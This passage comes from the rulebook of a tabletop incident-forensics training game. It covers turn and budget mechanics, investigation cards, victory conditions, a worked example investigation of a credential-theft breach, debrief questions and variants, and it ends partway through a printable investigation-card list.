TIER 2 (Intermediate) 8-10 Organized attacker, some sophistication Credential theft ring, lateral movement
TIER 3 (Advanced) 11-13 Skilled APT, heavy obfuscation Sophisticated threat group with operational security
TIER 4 (Expert) 14-15 Nation-state, elite techniques State-sponsored APT with counter-forensics

Turn Count Randomization: - Select your chosen tier's baseline (6-8, 8-10, 11-13, or 14-15) - Roll d4: -1, 0, 0, or +1 - Add result to baseline to get final turn count - Example: TIER 2 (8-10) + d4 result of +1 = final turn count of 9-11 turns

Step 2: Prepare Threat Scenario

Secret TO Preparation:

  1. Select Attack Chain: Choose 3-5 Threat cards from Incident Response core deck or expansion deck
  2. Arrange in logical progression (initial access → lateral movement → exfiltration)
  3. Consider realistic attack flow: not every attack needs all phases

  4. Map Investigations: For each threat card, note which Investigation Actions would discover it

  5. Example: Malware persistence → Disk Forensics, Malware Analysis
  6. Example: C2 communications → Network Traffic Analysis
  7. Example: Credential abuse → Event Log Analysis

  8. Plan Evidence Discovery: Prepare which Evidence cards will be revealed as each Investigation Action succeeds

  9. Not all investigations succeed (some are dead-ends)
  10. Some evidence cards might be discovered by multiple investigation paths

  11. Set Attacker Profile: In your notes, decide:

  12. Attacker motivation (cybercrime, espionage, hacktivism, nation-state)
  13. Sophistication level (matches the tier)
  14. Likely techniques (reference MITRE ATT&CK framework)
  15. Tools used (commercial, custom, open-source)

Example Secret Setup (TIER 2):

Threat Cards Selected: Phishing → Credential Harvesting → Lateral Movement → Persistence → Exfiltration Turn Count: 8-10 (TIER 2, no roll modifier used) Attacker Profile: Eastern European cybercriminal group focused on financial data theft Key Evidence: Phishing email headers, malware samples, persistence mechanisms, C2 communications Attribution Clues: Russian language in malware, specific tool signature, Bitcoin payment addresses Investigation Challenge: Attacker deleted logs; Blue Team must reconstruct from network traffic and memory forensics

Step 3: Brief the Blue Team

Read the Incident Briefing to all investigators:

INCIDENT BRIEFING

"You've been called by [Company Name] to investigate a data breach discovered during routine system maintenance. Here's what we know so far:

Timeline of Discovery: - System administrator noticed unusual network traffic on [Date] - Forensic examination discovered evidence of system compromise dating back approximately [2-3 weeks / 1 month] - Data breach notification team estimates millions of records may have been accessed

What Was Affected: - Database servers containing customer information - Admin accounts showing unauthorized access - Backup systems with potential exfiltration evidence

Your Mission: - Reconstruct the complete attack chain (how did they get in? what did they do? how did they get out?) - Identify what data was compromised (scope and sensitivity) - Attribute the attack to a known threat group or attacker profile if possible - Produce findings for the company's security hardening and incident prevention

Resources Available: - Forensic laboratory time: 75 Budget units - [Optional: +25 if company has cyber insurance or threat intelligence subscription] - Investigation period: [TURN COUNT] turns (represents [1-3 weeks] of forensic work)

Regulatory Context: - Time-sensitive: Investigation results feed into breach notification requirements - Chain of custody critical: Findings must be admissible if this goes to law enforcement

You have [TURN COUNT] turns. Begin your investigation."

Step 4: Initialize Tracking

On a shared board or spreadsheet, create:

  1. Turn Tracker: Current turn = 1, Max turns = [TURN COUNT]
  2. Budget Tracker: Current budget = 75 (or 100), tracker range 0-100
  3. Progress Meters:
  4. Timeline Completeness: 0%
  5. Attack Chain Reconstruction: 0%
  6. Attribution Confidence: 0%
  7. Evidence Chain of Custody: 0%
  8. Evidence Log: Space to list discovered Evidence cards and their sources
  9. Investigation Record: Track which Investigation Actions have been attempted (successful and failed)

Turn Sequence

Each Turn Has 3 Steps

Step 1: Blue Team Describes Action (5 minutes)

One investigator (or the whole team collectively) describes what forensic investigation they want to perform.

Options:

Option A: Conduct Investigation - Choose an Investigation Action card (Disk Forensics, Memory Analysis, Log Analysis, Network Traffic, Malware Analysis, Timeline Reconstruction, or Threat Attribution) - Describe HOW they'll conduct the investigation (methodology, tools, expected findings) - Declare the Budget cost (shown on card) — paid on the turn you start - Note the card's Duration (v2.2): starting the investigation is your action this turn; counting this turn as turn 1, the roll and results arrive at the START of turn N (Duration 1 = same turn, Duration 2 = start of next turn, Duration 3 = two turns later). Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting. - Example: "We'll do a full disk image of the compromised database server and look for persistence mechanisms, rootkits, and artifact evidence. Cost 10 Budget, Duration 2 — results at the start of next turn."

Option B: Analyze Existing Evidence — Cost: 5 Budget (v2.2) - Review 2-4 Evidence cards already discovered — each Evidence card can be Analyzed only once (v2.2); mark cards as Analyzed - Describe connections between findings (temporal sequence, technical relationships, or attribution links) - Example: "The malware sample matches the persistence mechanism we found in scheduled tasks, suggesting the attacker knew exactly what they were doing. Plus, the C2 domain was registered by the same person who registered two other domains we found in old breach reports."

Option C: Follow Investigative Lead — Cost: 5 Budget (v2.2) - Pick an Evidence card with an "Investigative Lead" noted - Describe how you'll pursue this lead - Example: "This C2 domain resolves to a Russian ASN. Let's do a WHOIS lookup and see what other domains are hosted on this infrastructure."


Step 2: TO Rolls & Resolves (2-3 minutes)

For Conduct Investigation or Follow Investigative Lead:

  1. Verify Cost: Check if Blue Team has sufficient Budget (Follow Lead costs 5 — v2.2)
  2. If insufficient Budget, investigation cannot proceed (suggest alternative action)

  3. Apply Duration (v2.2): For a Duration 2-3 investigation, the cost and action are spent now, but steps 3-5 happen at the START of the turn the investigation completes (Duration 1 resolves immediately)

  4. Set Difficulty Class (DC): TO checks Investigation Action card for DC

  5. Example: Disk Forensics has DC 12
  6. Modify DC if anti-forensics present: +2 DC
  7. Modify DC if attacker was sophisticated: +1-2 DC

  8. Determine Modifiers: Apply skill modifiers to the roll

  9. +2 if investigator has forensics certification
  10. +1 if basic IT security background
  11. +2 if team provides detailed technical narrative
  12. +1 if previous investigation discovered clues to this action
  13. -2 if attempting hastily (rushed, final turn desperation) (v2.2)

  14. Roll: Investigator (or TO on their behalf) rolls d20

  15. Compare Results:

  16. Success (roll ≥ DC): Discover ONE Evidence card (unless the card says otherwise — MEM-02 and NET-02 award TWO) and apply ONLY that Evidence card's printed meter impacts (typically +5-35% per meter; major breakthroughs can exceed +20%). The investigation card's own advance line applies only if no Evidence card is produced (v2.2: No Double Counting)
  17. Partial Success (roll DC-2 to DC-1): Discover partial or incomplete evidence + apply the investigation card's partial advance line (typically +5-15%)
  18. Failure (roll < DC-2): No evidence discovered; Budget still spent; take a turn

For Analyze Existing Evidence:

  1. Pay Cost: 5 Budget (v2.2); the 2-4 Evidence cards reviewed must not have been Analyzed before
  2. Describe Connection: Blue Team explains how findings are related
  3. Roll: d20 + investigator skill modifier vs. DC 10
  4. Results:
  5. Success (≥10): Gain insight; advance two Progress Meters by 5-10% each
  6. Failure (<10): No progress; use a turn (Budget still spent)

Step 3: Record & Update Tracking (1-2 minutes)

  1. Deduct Budget: Subtract action cost from Budget Tracker
  2. Advance Turn: Increment Turn counter by 1
  3. Update Progress Meters: Record any progress from resolved investigations
  4. Note Evidence: If Evidence card discovered, add to Evidence Log with source and chain of custody status
  5. Chain of Custody (v2.2): +5% Chain of Custody for each Evidence card discovered this turn IF the team stated how it was preserved (hash, imaging, log export); TO may award +10% for exemplary handling
  6. Check Victory Condition: Did Blue Team achieve any victory condition? (see Victory Conditions section)

Investigation Actions & Evidence

Investigation Action Cards (Quick Reference)

Card DC Cost Duration What It Reveals
DISK-01: Disk Image & Analysis 12 10 2 turns Deleted files, malware samples, persistence mechanisms
DISK-02: File System Carving 14 15 3 turns Deep file recovery, hidden artifacts, encrypted data
MEM-01: Memory Dump & Analysis 13 15 2 turns Volatile processes, injected code, C2 connections
MEM-02: Memory Forensics Deep Dive 15 20 3 turns Malware behavior analysis, encryption keys, exploits
LOG-01: Event Log Analysis 11 5 1 turn User login timeline, privilege escalation, admin actions
LOG-02: Deep Log Correlation 13 10 2 turns Cross-system timeline, attack sequence, lateral movement
NET-01: Network Traffic Analysis 12 10 2 turns Exfiltration evidence, C2 communications, data flows
NET-02: Packet Capture Deep Analysis 14 15 3 turns Protocol forensics, attacker tools, communication patterns
MALW-01: Malware Analysis (Dynamic) 12 15 2 turns Behavior analysis, IOCs, capabilities
MALW-02: Malware Analysis (Static) 14 10 2 turns Code reverse engineering, attacker signatures, techniques
TIMELINE-01: Timeline Reconstruction 13 5 1 turn Chronological attack sequence, entry and exit points
THREAT-01: Threat Attribution Analysis 15 20 3 turns Link to known threat groups, TTPs, motivation

DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1. Duration rule: results arrive at the start of the turn the Duration completes — see Turn Sequence.


Victory & Failure Conditions

Investigation Complete (VICTORY)

Blue Team wins if they achieve ONE of these (canonical v2.2 conditions — identical to the module rules):

Victory Condition 1: "Full Attribution" - Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80% - Result: "You have successfully attributed this attack to [Threat Group]. Intelligence briefing prepared for leadership."

Victory Condition 2: "Solid Case" - Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70% - Result: "Your forensic investigation is publishable quality and legally defensible. Law enforcement briefed."

Victory Condition 3: "Partial Findings" - Any two Progress Meters ≥ 70% at game end - Result: "Investigation concluded with sufficient findings for remediation. Hardening team can now implement controls."


Investigation Inconclusive (FAILURE)

Blue Team fails if, at the turn limit, no victory condition is met.

Precedence (v2.2): Victory conditions are always checked FIRST. There is no "any meter < 40% = failure" clause (deleted — it conflicted with Victory Condition 3), and budget exhaustion is not a loss: you may always fall back on the cheap 5-Budget actions while Budget lasts, and the game simply plays out to the turn limit.

Result of failure: "Investigation stalled. Too many unanswered questions. Threat actor remains unidentified. Forensic team recommends additional investigation by external firm."

Consequence of Failure: - Investigation results are incomplete and cannot feed into Hardening or Network Building modules - Audit & Compliance module must assess security posture with incomplete information - Organization loses confidence in threat intelligence


Example Investigation (Complete Turn)

Scenario Setup (TO Secret)

TIER 2 attack: Credential-based lateral movement with persistence Turn limit: 8 turns (TIER 2 baseline 9, d4 roll of -1) Attacker profile: Eastern European cybercriminal group Key technique: Password spray → Privilege escalation → Scheduled task persistence → Data exfiltration Bonus: The sysadmin's initial triage captured a suspicious binary, so a malware sample is available from turn 1

Turn 1

Blue Team: "We'll start with event log analysis of the compromised database server. We want to see the login history and identify unusual access patterns. We'll export the logs with their digital signatures and hash the export."

Investigator Skill: IT Security background (+1)

TO Facilitator: 1. Check Cost: LOG-01 costs 5 Budget. Current budget 75. ✓ OK 2. Check Duration: LOG-01 is Duration 1 — resolves this turn 3. Set DC: LOG-01 has DC 11. No anti-forensics. DC = 11 4. Apply Modifiers: +1 (IT security background) + 0 (no prior clues) = +1 total 5. Roll: Investigator rolls d20+1. d20 = 13, total 14 6. Success! (14 ≥ 11) → Discover Evidence card EVD-04 "Suspicious Admin Login (Timeline)" — apply ONLY its printed impacts (v2.2 No Double Counting)

Update Tracking: - Budget: 75 - 5 = 70 remaining - Turn: 1 → 2 - EVD-04 printed impacts: Timeline 0% → 25%, Attack Chain 0% → 20%, Attribution 0% → 10% - Chain of Custody: 0% → 5% (v2.2: preservation stated — signed log export, hashed) - Evidence Log: "EVD-04 - discovered via LOG-01 - preserved via signed/hashed export - Chain of Custody: intact"

Blue Team Deduction: "Looks like an admin account was accessed from unusual locations. Might be credential theft."


Turn 2

Blue Team: "Let's analyze that malware sample from triage. We want to understand what it does and where it connects to."

Investigator Skill: Forensic certification background (+2)

TO Facilitator: 1. Check Cost: MALW-01 costs 15 Budget. Current budget 70. ✓ OK 2. Check Duration (v2.2): MALW-01 is Duration 2. Starting the sandbox run is this turn's action; the roll and results arrive at the START of turn 3. MALW-01 is now the one multi-turn investigation in flight.

Update Tracking: - Budget: 70 - 15 = 55 remaining - Turn: 2 → 3 - Meters: unchanged (results pending) — Timeline 25%, Attack Chain 20%, Attribution 10%, Chain of Custody 5%


Turn 3

Start of turn — MALW-01 resolves (v2.2 Duration): 1. Set DC: MALW-01 has DC 12. Attacker was moderately sophisticated: +1. DC = 13 2. Apply Modifiers: +2 (forensic cert) 3. Roll: d20 = 14, total 16 4. Success! (16 ≥ 13) → Discover EVD-02 "Command-and-Control Callback Domain" - EVD-02 printed impacts: Attack Chain 20% → 35%, Attribution 10% → 35%, Timeline 25% → 30% - Chain of Custody: 5% → 10% (v2.2: sample hashed, sandbox logs archived)

Turn 3 action — Blue Team: "Now let's look at network flow records for that C2 domain. Start NET-01."

TO Facilitator: NET-01 costs 10 (budget 55 → 45 ✓), Duration 2 — resolves at the start of turn 4. (Allowed: MALW-01 finished this turn, so only one investigation is in flight.)

Update Tracking: - Budget: 45 remaining - Turn: 3 → 4 - Meters: Timeline 30%, Attack Chain 35%, Attribution 35%, Chain of Custody 10%

Blue Team Deduction: "The malware communicates with an external server. That's how the attacker stays in control."


Turn 4

Start of turn — NET-01 resolves (v2.2 Duration): 1. Set DC: NET-01 has DC 12 2. Apply Modifiers: +1 (IT security background) 3. Roll: d20 = 9, total 10 4. Partial Success (10 is in the DC-2 to DC-1 band, 10-11) → Suspicious outbound traffic found, but the destination is unclear. No Evidence card produced, so apply NET-01's partial advance line: Attack Chain 35% → 45%, Attribution 35% → 40%. No Chain of Custody handling bonus (no Evidence card discovered).

Turn 4 action — Blue Team: "Let's try to reconstruct the timeline from what we have. TIMELINE-01."

TO Facilitator: TIMELINE-01 costs 5 (budget 45 → 40 ✓), Duration 1 — resolves now. DC 13, +2 (DFIR training). Roll: d20 = 8, total 10. Failure (10 < 11, below the DC-2 partial band). Too many timestamp gaps. Budget still spent.

Update Tracking: - Budget: 40 remaining - Turn: 4 → 5 - Meters: Timeline 30%, Attack Chain 45%, Attribution 40%, Chain of Custody 10%


Turn 5 (Critical Decision)

Blue Team: "This is expensive, but let's start the Memory Forensics Deep Dive on the admin workstation. If the attacker has malware in memory, we might find encryption keys or recent commands that show their intent."

TO Facilitator: 1. Check Cost: MEM-02 costs 20 Budget. Current budget 40. ✓ OK 2. Check Duration (v2.2): MEM-02 is Duration 3 — started this turn (turn 1 of 3), it resolves at the START of turn 7. It is now the one multi-turn investigation in flight.

Update Tracking: - Budget: 40 - 20 = 20 remaining - Turn: 5 → 6 - Meters: unchanged (results pending)


Turn 6 (Working While Waiting)

Blue Team: "While the memory analysis runs, let's Analyze our existing evidence. The suspicious admin login (EVD-04, T1078 Valid Accounts) lines up with the C2 callbacks (EVD-02, T1071 Application Layer Protocol): the login happened 20 minutes before the first beacon. This was credential theft followed by remote control."

TO Facilitator: 1. Check Cost: Analyze Existing Evidence costs 5 (v2.2). Budget 20 → 15 ✓. (Allowed while MEM-02 is in flight — Analyze is not an investigation.) 2. Check cards: EVD-04 and EVD-02 have not been Analyzed before ✓ — mark both as Analyzed (v2.2: each Evidence card only once) 3. Modifiers: +1 (references specific MITRE ATT&CK techniques) + 1 (IT security background) = +2 4. Roll: d20 = 12, total 14 vs. DC 10. Success! → Advance two meters by 10% each: Timeline 30% → 40%, Attribution 40% → 50%

Update Tracking: - Budget: 15 remaining - Turn: 6 → 7 - Meters: Timeline 40%, Attack Chain 45%, Attribution 50%, Chain of Custody 10%

Blue Team Deduction: "Credential theft, then hands-on-keyboard control. Now we need the memory results."


Turn 7 (Breakthrough)

Start of turn — MEM-02 resolves (v2.2 Duration, started turn 5): 1. Set DC: MEM-02 has DC 15 2. Apply Modifiers: +2 (forensic analyst) + 1 (MALW-01 already completed) = +3 3. Roll: d20 = 11, total 14 4. Partial Success (14 is in the DC-2 to DC-1 band, 13-14) → Discover ONE complete Evidence card, EVD-09 "Attacker Command History", plus an INCOMPLETE second finding (fragments of an RC4 key — marked INCOMPLETE, no meter impact until completed or interpreted) - EVD-09 printed impacts: Timeline 40% → 65%, Attack Chain 45% → 70%, Attribution 50% → 65%, Chain of Custody 10% → 20% - Chain of Custody: 20% → 25% (v2.2: memory image hashed, extraction methodology documented)

Turn 7 action — Blue Team: "Follow the investigative lead on EVD-02: WHOIS and ASN lookup on the C2 domain to map related attacker infrastructure."

TO Facilitator: 1. Check Cost: Follow Investigative Lead costs 5 (v2.2). Budget 15 → 10 ✓ 2. Set DC: 12 3. Apply Modifiers: +2 (detailed approach referencing prior evidence) 4. Roll: d20 = 14, total 16. Success! → Discover EVD-07 "Attacker Infrastructure Map" — apply its printed impacts (v2.2: no separate +20% Attribution bonus — No Double Counting) - EVD-07 printed impacts: Attribution 65% → 95%, Attack Chain 70% → 85%, Timeline 65% → 75% - Chain of Custody: 25% → 30% (v2.2: WHOIS records and passive-DNS exports archived)

Update Tracking: - Budget: 10 remaining - Turn: 7 → 8 of 8 (final turn) - Meters: Timeline 75%, Attack Chain 85%, Attribution 95%, Chain of Custody 30%

Victory check: Condition 1 needs Attribution ≥ 90% ✓ (95%) AND Timeline ≥ 80% ✗ (75%). Not yet. Condition 2 needs Timeline ≥ 80% ✗. Play on.


Turn 8 (Final Turn)

Blue Team: "One more push on the timeline. We retry TIMELINE-01, now synthesizing the login timeline (EVD-04), the C2 beacons (EVD-02), and the attacker's command history (EVD-09)."

TO Facilitator: 1. Check Cost: TIMELINE-01 costs 5. Budget 10 → 5 ✓. Duration 1 — resolves now. 2. Set DC: 13 3. Apply Modifiers: +2 (DFIR training) + 1 (prior investigations provide clues) = +3 4. Roll: d20 = 15, total 18. Success! All timeline-type evidence has already been discovered, so no new Evidence card is produced — apply TIMELINE-01's own advance line instead (v2.2 No Double Counting): Timeline 75% → 100%, Attack Chain 85% → 100%

Update Tracking: - Budget: 5 remaining - Turn: 8 of 8 — game end - Final meters: Timeline 100%, Attack Chain 100%, Attribution 95%, Chain of Custody 30%


Victory Determination (Game End, After Turn 8)

Check Victory Conditions (v2.2 — victory is checked first, never overridden by a low meter):

Condition 1 "Full Attribution": Attribution ≥ 90% AND Timeline ≥ 80%? - Attribution: 95% ✓ - Timeline: 100% ✓ - YES! VICTORY CONDITION 1 MET!

(For completeness: Condition 2 "Solid Case" fails on Chain of Custody 30% < 70%; Condition 3 "Partial Findings" would also be met with three meters ≥ 70% at game end. Note the v2.2 precedence rule: Chain of Custody sitting at 30% does NOT cause a failure — the old "any meter < 40%" clause is deleted. Meter averages are never used.)

Game Ends with VICTORY

Investigation Result: "Your forensic investigation successfully identified the attacker as a member of the [Eastern European Cybercriminal Group]. Key findings: - Attack vector: Credential theft via password spray - Control: C2 beaconing from checkupdate-style domains, hands-on-keyboard commands recovered from memory - Timeline: fully reconstructed from signed logs, beacon timing, and command history - Attribution: 95% confidence linked to known group via infrastructure map - Caveat: evidence admissibility is weak (Chain of Custody 30%) — fine for hardening, not for court

Recommendations: 1. Implement multi-factor authentication on admin accounts 2. Deploy EDR solution to detect persistence mechanisms 3. Implement network segmentation to limit lateral movement 4. Increase logging and monitoring of admin activities

This investigation will inform the Hardening, Network Building, and Audit modules going forward."


Tips for Investigators

Investigation Strategy

Early Game (Turns 1-3): - Start with cheaper, lower DC investigations (Log Analysis, Timeline Reconstruction) - Build foundation of knowledge before attempting expensive techniques - Goal: 50%+ progress on any meter by turn 3

Mid Game (Turns 4-7): - Use findings from early investigations to guide more expensive deep dives - Follow Investigative Leads to get "bang for your budget" - Aim for 75%+ on at least two meters by turn 6

Late Game (Turns 8+): - If you have momentum, push for one complete meter (≥90%) - If budget is tight, focus on two meters reaching ≥70% (Condition 3) - Make bold investigations; you have less to lose

Narrative Details Matter

To Gain Bonuses: - Explain not just WHAT you'll investigate, but HOW and WHY - Reference specific evidence already discovered - Mention MITRE ATT&CK techniques you're looking for - Example (gains +2): "We found a persistence mechanism in the scheduled tasks. This matches T1053 (Scheduled Task/Job). Let's do Memory Forensics to find if the malware is still resident in RAM and tracking recent C2 communications."

Evidence Correlation

Create Connections: - Note which investigations led to which evidence cards - Look for patterns: "All malware samples have Russian-language strings" - Timeline building: "Login at 2:15, C2 connection at 2:10, exfiltration at 2:25" - These connections trigger Analyze Evidence action and drive attribution forward


Tips for the Threat Orchestrator

Maintaining Suspense

Pacing the Game

Challenge Scaling

For Beginner Investigators: - Use TIER 1 attacks (6-8 turns, low DC, no anti-forensics) - Provide hints during briefing ("We recovered a memory dump") - Allow retries on failed Investigation Actions

For Experienced Investigators: - Use TIER 3-4 attacks (11-15 turns, high DC, sophisticated anti-forensics) - Limit Budget more strictly - Add False Evidence cards (partial investigation leads to wrong conclusion)


Debrief & Learning Outcomes

Post-Game Discussion (10-15 minutes)

After game concludes, facilitate discussion:

On Investigation Process: 1. Which investigation technique was most valuable? Why? 2. What would you do differently with more budget? 3. What evidence was hardest to interpret? 4. How did you decide which investigation to do next?

On Attack Reconstruction: 1. Walk through the attack chain step-by-step. What happened first? Last? 2. How did the attacker maintain access without being detected immediately? 3. What's one technique that could have prevented this entire attack?

On Attribution: 1. What evidence pointed to the attacker's identity? 2. How confident are you in the attribution? (At 75%? 90%?) 3. What additional evidence would make you 95%+ confident?

On Real-World Forensics: 1. How does this compare to actual forensic investigations you've studied? 2. What tools mentioned in the game (memory forensics, malware analysis) are used in real incident response? 3. Why does attribution matter? (Law enforcement, threat intelligence sharing, policy response)

On Lessons Learned: 1. What control from Hardening module could have detected this attack early? 2. How would Network Building architecture limit lateral movement? 3. What Audit & Compliance questions need to be answered?


Standalone Forensics Variants

Variant 1: Time-Pressure Mode

Modified Rules: Reduce turn count by 3 (so 3-7 turns instead of 6-10)

Effect: Creates higher stakes; investigators must make faster decisions; less time for methodical analysis

When to Use: Advanced investigators who want more challenge; time-limited classroom sessions


Variant 2: False Evidence Mode

Modified Rules: TO secretly includes 1-2 "False Evidence" cards that appear legitimate but are actually red herrings

Effect: Attribution becomes harder; investigators must corroborate findings; critical thinking required

Example: Malware sample analysis reveals Russian-language strings → seems like Eastern European group. But it was actually planted by another threat group to frame competitors.

When to Use: Teaching about false positives and need for corroboration


Variant 3: Cold Case Mode

Modified Rules: Start with 40% progress already on one or two meters (from prior investigation by another team)

Effect: Investigators build on existing findings rather than starting from scratch

When to Use: Teaching how investigations are handed off; continuing previous work


Variant 4: Competitive Mode

Modified Rules: Two teams of investigators compete to achieve highest progress on most meters

Scoring: +3 points per meter ≥ 90%, +2 points per meter 70-89%, +1 per meter 40-69%

When to Use: Competitive classroom tournament; multiple teams investigating same breach simultaneously


Recommended Module Sequences with Forensics

30-minute Warm-up: Forensics solo (TIER 1, 6-turn simplified scenario)

90-minute Session: Incident Response (45 min) + Forensics (45 min) - Phase 1: IR team detects attack chain - Phase 2: Forensics team investigates findings

120-minute Session: Incident Response → Disaster Recovery mini → Forensics - Phase 1: IR failure (breach not contained) - Phase 2: DR (crisis management, brief) - Phase 3: Forensics (investigation & attribution)

180+ minute Session: Complete lifecycle with Forensics - Network Building (45 min) → Hardening (45 min) → Incident Response (45 min) → Forensics (30 min)


Quick Reference Card for Investigators

Setup: Choose TIER (1-4), Roll d4, Announce turn count and starting budget (75)

Each Turn: 1. Resolve arrivals (v2.2): Any Duration 2-3 investigation completing this turn rolls and resolves at the start of the turn 2. Choose action: Conduct Investigation (card cost, Duration 1-3), Analyze Evidence (5 Budget, each Evidence card only once), or Follow Lead (5 Budget) 3. Pay cost: Deduct Budget 4. Roll d20: Add skill modifier, compare to DC (partial success on DC-2 to DC-1); Duration 2-3 investigations roll when they complete 5. Resolve: Discover evidence (apply the Evidence card's printed impacts — never also the investigation card's advance line), or fail 6. Update: Budget, Turn counter, Progress Meters (+5% Chain of Custody per Evidence discovery with stated preservation)

Resources: - Budget: 75 (represents forensic lab time; tracker range 0-100) - Turns: 6-15 (depends on tier + d4 roll) - Progress Meters: Timeline, Attack Chain, Attribution, Chain of Custody (each 0-100%)

Victory (v2.2): - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80% - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70% - V3 "Partial Findings": any two meters ≥70% at game end

Failure (v2.2): At the turn limit, no victory condition met. Victory is checked first — there is no meter-minimum failure clause, and budget exhaustion is not a loss. investigation


Forensics Card Deck Checklist

Before playing, ensure you have:


Frequently Asked Questions

Q: Can I play Forensics if I've never played Incident Response? A: Yes! Forensics standalone is completely self-contained. You don't need to have played IR, Hardening, or any other module first.

Q: How long does Forensics take? A: Typically 45-90 minutes depending on group experience level and decision speed. Experienced investigators finish faster.

Q: Can I play Forensics with a large group? A: Yes! 4-8 investigators is ideal. With more, split into two teams (each team has its own TO). You can even do competitive mode where both teams investigate the same breach.

Q: What if investigators want to know the tier? A: Don't tell them. Part of the game is discovering how sophisticated the attacker is through evidence analysis. Let them discover it.

Q: What if we run out of budget before solving the case? A: That's a realistic outcome, and it is NOT an automatic loss (v2.2). Keep playing to the turn limit — the cheap 5-Budget actions (Analyze Evidence, Follow Lead, LOG-01, TIMELINE-01) stretch a thin budget, and at game end you check victory normally. If any two meters are ≥70% at game end, you win via Condition 3 (like real-world investigations with incomplete findings). If no condition is met at the turn limit, the investigation is inconclusive.

Q: Can we retry a failed investigation? A: You can attempt the same investigation again next turn (costs full budget again), but you still don't know if you'll succeed. You're essentially re-investigating the same evidence looking for something you missed.


Printable Components

All printable cards are available in: - cards/forensics/core-deck/investigation-cards.md — 12 Investigation Action cards - cards/forensics/core-deck/evidence-cards.md — 12 Evidence cards + 4 Findings cards (Findings section)

Progress Meter Tracker: print templates coming in the print pack. Until then, draw a simple 4-meter tracker on paper: four rows labeled Timeline Completeness, Attack Chain Reconstruction, Attribution Confidence, and Evidence Chain of Custody, each marked 0-100% in 5% steps, plus a Turn row and a Budget row (0-100).


Ready to investigate? Print your cards, gather 1-4 forensic analysts, and begin your investigation. Good luck!

cards/forensics/core-deck/investigation-cards.md

Forensics Module: Investigation Action Cards (Core Deck)

Version: 2.2 - Playtest Edition Card Count: 12 Investigation Action Cards Printable: Yes (see printing instructions below)


Overview

Investigation Action cards represent specific forensic analysis techniques that investigators can deploy to discover evidence about the attack. Each card has a Difficulty Class (DC) that represents the skill required to successfully complete the investigation, a Cost in Budget, and a Duration showing how many turns the investigation takes.

Duration rule (v2.2): Starting an investigation with Duration N occupies your action (and its Budget cost) on the turn you start it. Counting that turn as turn 1, the roll is made and the results arrive at the START of turn N — so Duration 1 resolves immediately, Duration 2 at the start of the next turn, Duration 3 two turns after starting. Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting.

No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts (plus the +5% Chain of Custody handling bonus for stating how it was preserved). The "Advance" line in each card's SUCCESS block applies only when no Evidence card is produced (e.g., no suitable undiscovered Evidence remains); partial-success advance lines apply as printed.


Card Structure

Each Investigation Action Card includes: - Card ID: Unique identifier (DISK-01, MEM-01, LOG-01, etc.) - Title: Name of investigation technique - MITRE ATT&CK: Referenced technique(s) this investigation detects - Difficulty Class (DC): Roll d20+modifiers vs. this to succeed (typically 11-15) - Cost: Budget units required - Duration: Number of turns investigation takes - Description: What the investigation does and what evidence it reveals - Success Conditions: What happens on success, partial success, or failure - Chain of Custody Notes: Any admissibility or documentation concerns


Card Details

DISK-01: Disk Image & Analysis

╔════════════════════════════════════════════════════════════════╗
║              DISK-01: DISK IMAGE & ANALYSIS                    ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Forensic Disk Imaging & Analysis                    ║
║ MITRE ATT&CK: T1005 (Data from Local System), T1025 (Data from ║
║              Removable Media)                                  ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns (v2.2 rush: pay +5 Budget for Duration 1)    ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Create a bit-for-bit disk image of the compromised system,     ║
║ then examine file system artifacts, deleted files, and         ║
║ hidden data. This is a foundational forensic technique.        ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Malware files (executables, scripts, libraries)              ║
║ - Deleted files (file carving reveals overwritten data)        ║
║ - Persistence mechanisms (startup folders, registry runs)      ║
║ - Downloaded files (browser cache, temp directories)           ║
║ - Suspicious file timestamps (backdating, mismatches)          ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12):                                        ║
║ Discover ONE Evidence card from: Malware Sample, Persistence   ║
║ Mechanism, or Downloaded Malware evidence set.                 ║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +10%, Attack Chain +15%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll DC-2 to DC-1 = 10-11):                  ║
║ Discover INCOMPLETE Evidence card (partial findings).          ║
║ Advance: Timeline Completeness +5%, Attack Chain +5%           ║
║                                                                 ║
║ FAILURE (roll < 10):                                           ║
║ No evidence discovered. Budget still spent. Take a turn.       ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Disk image must be bit-for-bit copy. Chain of custody:         ║
║ Strong - Imaging is gold standard in forensics.                ║
║ ✓ All evidence from this source is admissible in court         ║
║                                                                 ║
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has formal GCIH/GCFE training               ║
║ +1 if investigator has IT administration background            ║
║ +1 if team provides detailed explanation of imaging process    ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Disk imaging is time-consuming (hence 2 turn cost)           ║
║ • Can be combined with DISK-02 for deeper analysis             ║
║ • Foundation for all disk-based forensic work                  ║
║ • Works best on traditional disk systems (less effective on    ║
║   SSDs with wear-leveling and TRIM commands)                   ║
╚════════════════════════════════════════════════════════════════╝

DISK-02: File System Carving

╔════════════════════════════════════════════════════════════════╗
║              DISK-02: FILE SYSTEM CARVING                      ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced File Recovery & Data Carving               ║
║ MITRE ATT&CK: T1074 (Data Staged), T1485 (Data Destruction)   ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14                                           ║
║ Budget Cost: 15                                                ║
║ Duration: 3 turns (specialized expertise required)             ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Advanced carving techniques recover data from unallocated      ║
║ disk space and file slack, even when files have been deleted   ║
